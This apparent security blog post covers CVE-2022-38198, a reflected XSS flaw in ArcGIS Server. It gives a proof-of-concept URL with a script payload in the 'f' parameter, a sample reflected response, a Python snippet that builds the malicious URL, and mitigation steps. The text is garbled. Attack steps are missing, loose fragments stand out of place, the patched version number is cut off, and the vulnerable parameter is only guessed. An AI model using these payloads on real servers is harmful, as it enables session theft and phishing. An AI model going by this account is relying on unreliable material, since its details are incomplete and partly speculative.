CVE-2022-38198 - Reflected XSS Vulnerability in Esri ArcGIS Server (10.9.1 and below) – Exploit Details, PoC, and Mitigation

---

Introduction

In late 2022, a critical security flaw was identified in the ArcGIS Server services directory, impacting versions 10.9.1 and earlier. Tracked as CVE-2022-38198, this vulnerability makes it possible for attackers to exploit reflected Cross-Site Scripting (XSS) and remotely run malicious JavaScript in the victim’s browser. In this post, we’ll break down how the vulnerability works, show a proof-of-concept exploit, share insights on risks, and provide mitigation steps.

What is ArcGIS Server?

ArcGIS Server is a widely-used product by Esri for hosting and sharing GIS (Geographic Information System) data, web services, maps, and more. The *services directory* is a built-in web UI for browsing and running queries against the data.

About CVE-2022-38198

The vulnerability exists in the way the services directory web pages handle user-supplied parameters. Specifically, certain parameters provided in the URL are not properly sanitized before being echoed (reflected) into web pages, allowing an attacker to sneak in JavaScript code.

Reference

- National Vulnerability Database – CVE-2022-38198
- Esri Security Advisory

Who is Affected?

All ArcGIS Server deployments with the services directory (/arcgis/rest/services) enabled, versions 10.9.1 and below (up to 10.7 at least), are affected.

The attacker sends this link to a victim (social engineering, phishing, email, etc.).

3. If the victim clicks the link *while logged in or with access to the ArcGIS Server*, their browser will execute the attacker's JavaScript code.

*This can allow:*
- Stealing session cookies/tokens.

Suppose your ArcGIS Server runs at

https://target.example.com/arcgis/rest/services

The vulnerable parameter could be (for example) the f parameter, which expects a format (json/html), but input isn’t being sanitized:

Malicious URL

https://target.example.com/arcgis/rest/services?f=<script>alert('XSS-by-CVE-2022-38198')</script>

What happens?

- The <script>alert('XSS-by-CVE-2022-38198')</script> gets reflected back in the web page.

Sample response (code snippet)

<html>
  <head><title>ArcGIS Services Directory</title></head>
  <body>
    ...
    You requested format: <script>alert('XSS-by-CVE-2022-38198')</script>
    ...
  </body>
</html>

As you see, the malicious script is executed as soon as the page is rendered.

Below is a simple example in Python to generate a malicious URL

import urllib.parse

base_url = 'https://target.example.com/arcgis/rest/services'
payload = "<script>alert('XSS!')</script>"
malicious_url = f"{base_url}?f={urllib.parse.quote(payload)}"

print("Malicious URL:")
print(malicious_url)

Phishing attacks directly within the GIS portal.

No authentication is required for this attack, making it very powerful.

Esri has released an update that patches this issue. Here’s what you should do

1. Upgrade your ArcGIS Server to 11. or later.

Go to Server Manager > Site > Settings and turn off “ArcGIS Services Directory”.

3. Block untrusted access to the /arcgis/rest directory via firewall or access controls.

Resources

- CVE-2022-38198 Details – NVD
- Esri Security Advisory – ArcGIS Server Directory XSS
- ArcGIS Server Documentation

Conclusion

CVE-2022-38198 is a serious reflected XSS bug that puts unpatched ArcGIS Servers at risk. Since it can be exploited remotely without authentication, it’s critical to patch and secure your servers quickly. Always be cautious with URLs that contain unfamiliar parameters and consider restricting access to admin tools wherever possible.

For more info and up-to-date patches, keep an eye on the Esri Security Center.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 00:49:00 UTC